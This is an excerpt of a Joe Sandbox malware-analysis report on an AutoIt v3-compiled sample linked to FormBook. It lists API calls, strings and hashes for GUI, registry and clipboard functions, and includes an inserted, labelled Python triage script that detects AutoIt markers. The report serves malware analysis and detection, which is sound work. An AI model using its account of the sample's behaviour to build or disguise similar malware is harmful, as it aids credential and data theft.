                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                            • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                            • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                            • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                            • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                          • String ID:
                                                                          • API String ID: 69173610-0
                                                                          • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                          • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                          • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                          • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                          APIs
                                                                          • DestroyWindow.USER32(?), ref: 004590F2
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                          • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                          • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                          • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                          • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                          • API String ID: 2910397461-517079104
                                                                          • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                          • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                          • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                          • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                          • API String ID: 1038674560-3360698832
                                                                          • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                          • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                          • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                          • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
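The String ID of the function above (the AutoIt preprocessor directives such as #NoAutoIt3Execute, #OnAutoItStartRegister and #include-once, compared with __wcsnicmp) together with the "AutoIt v3" window class and msctls_progress32 control created by the earlier functions identify this image as the AutoIt v3 runtime carrying a compiled script. The following triage helper is an added example, not part of the Joe Sandbox report or of AutoIt itself: it scans a raw memory dump or unpacked PE for exactly the markers this report lists. The marker table, the weak/strong split and the UTF-16LE-plus-ASCII search are the author's assumptions; the sample blob is constructed, not taken from the analysed sample.

```python
import sys

# Markers taken from the API/String IDs listed in this report: the window
# class the runtime passes to CreateWindowExW ("AutoIt v3"), the progress
# control it creates, and the script-preprocessor directives and parser
# error strings the interpreter compares with __wcsnicmp.
AUTOIT_MARKERS = (
    "AutoIt v3",
    "msctls_progress32",
    "#NoAutoIt3Execute",
    "#OnAutoItStartRegister",
    "#requireadmin",
    "#notrayicon",
    "#include-once",
    "Cannot parse #include",
    "Unterminated group of comments",
)

# Assumption: a common-control class name alone is weak evidence, since any
# GUI program can create a progress bar; it only supports the other markers.
WEAK_MARKERS = {"msctls_progress32"}


def find_autoit_markers(blob: bytes) -> dict:
    """Return {marker: [encodings found]} for every marker present in blob.

    The W-suffixed APIs in the report (CreateWindowExW, __wcsnicmp) mean the
    strings are UTF-16LE in memory, but a packed or partially decoded sample
    may still carry ASCII copies, so both encodings are searched. Matching is
    case-insensitive to mirror __wcsnicmp; bytes.lower() only folds the ASCII
    range, which is exactly the low byte of each UTF-16LE code unit here.
    """
    found = {}
    lowered = blob.lower()
    for marker in AUTOIT_MARKERS:
        hits = []
        for label, codec in (("ascii", "ascii"), ("utf-16le", "utf-16-le")):
            if marker.lower().encode(codec) in lowered:
                hits.append(label)
        if hits:
            found[marker] = hits
    return found


def classify(found: dict) -> str:
    """Turn the marker hits into a one-line triage verdict."""
    strong = [m for m in found if m not in WEAK_MARKERS]
    directives = [m for m in strong if m.startswith("#")]
    if "AutoIt v3" in found and directives:
        return "compiled AutoIt v3 script (runtime and preprocessor strings present)"
    if strong:
        return "possible AutoIt v3 artefact (partial markers)"
    return "no AutoIt v3 markers"


# Constructed test input (not a real dump): filler bytes around UTF-16LE
# copies of two markers and an ASCII copy of the control class name, the way
# they would sit in the read-only data of an unpacked image.
SAMPLE_BLOB = (
    b"\x00" * 16
    + "AutoIt v3".encode("utf-16-le") + b"\x00\x00"
    + "#NoAutoIt3Execute".encode("utf-16-le") + b"\x00\x00"
    + b"msctls_progress32\x00"
    + b"\x90" * 16
)


if __name__ == "__main__":
    # Usage: python autoit_markers.py <dump-or-pe-file>
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    hits = find_autoit_markers(data)
    for marker, encodings in hits.items():
        print(f"{marker!r}: {', '.join(encodings)}")
    print(classify(hits))
```

Run it over the 00401000 memory dump referenced in the Memory Dump Source entries (or the original PE) to confirm the AutoIt runtime before spending time on the GUI functions listed here; the compiled script payload, where the FormBook loader logic would live, is what still needs extraction.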
                                                                          APIs
                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                          • SetCursor.USER32(00000000), ref: 0043075B
                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                          • SetCursor.USER32(00000000), ref: 00430773
                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                          • SetCursor.USER32(00000000), ref: 0043078B
                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                          • SetCursor.USER32(00000000), ref: 004307A3
                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                          • SetCursor.USER32(00000000), ref: 004307BB
                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                          • SetCursor.USER32(00000000), ref: 004307D3
                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                          • SetCursor.USER32(00000000), ref: 004307EB
                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                          • SetCursor.USER32(00000000), ref: 00430803
                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                          • SetCursor.USER32(00000000), ref: 0043081B
                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                          • SetCursor.USER32(00000000), ref: 00430833
                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                          • SetCursor.USER32(00000000), ref: 0043084B
                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                          • SetCursor.USER32(00000000), ref: 00430863
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                          • SetCursor.USER32(00000000), ref: 0043087B
                                                                          • SetCursor.USER32(00000000), ref: 00430887
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                          • SetCursor.USER32(00000000), ref: 0043089F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load
                                                                          • String ID:
                                                                          • API String ID: 1675784387-0
                                                                          • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                          • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                          • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                          • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                          APIs
                                                                          • GetSysColor.USER32(0000000E), ref: 00430913
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                          • GetSysColor.USER32(00000012), ref: 00430933
                                                                          • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                          • GetSysColor.USER32(0000000F), ref: 00430959
                                                                          • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                          • GetSysColor.USER32(00000011), ref: 00430979
                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                          • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                          • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                          • SelectObject.GDI32(?,?), ref: 004309B4
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                          • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                          • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                          • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                          • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                          • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                          • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                          • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                          • DeleteObject.GDI32(?), ref: 00430AE9
                                                                          • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                          • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 1582027408-0
                                                                          • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                          • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                          • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                          • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                          APIs
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CloseConnectCreateRegistry
                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                          • API String ID: 3217815495-966354055
                                                                          • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                          • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                          • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                          • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 004566AE
                                                                          • GetDesktopWindow.USER32 ref: 004566C3
                                                                          • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                          • DestroyWindow.USER32(?), ref: 00456746
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                          • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                          • IsWindowVisible.USER32(?), ref: 0045682C
                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                          • GetWindowRect.USER32(?,?), ref: 00456873
                                                                          • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                          • CopyRect.USER32(?,?), ref: 004568BE
                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                          • String ID: ($,$tooltips_class32
                                                                          • API String ID: 225202481-3320066284
                                                                          • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                          • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                          • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                          • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                          APIs
                                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                          • CloseClipboard.USER32 ref: 0046DD99
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                          • String ID:
                                                                          • API String ID: 15083398-0
                                                                          • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                          • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                          • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                          • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                          • GetClientRect.USER32(?,?), ref: 00471D05
                                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                          • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                          • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                          • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                          • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                          • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                          • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                          • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                          • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                          • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                          • String ID: @$AutoIt v3 GUI
                                                                          • API String ID: 867697134-3359773793
                                                                          • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                          • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                          • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                          • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
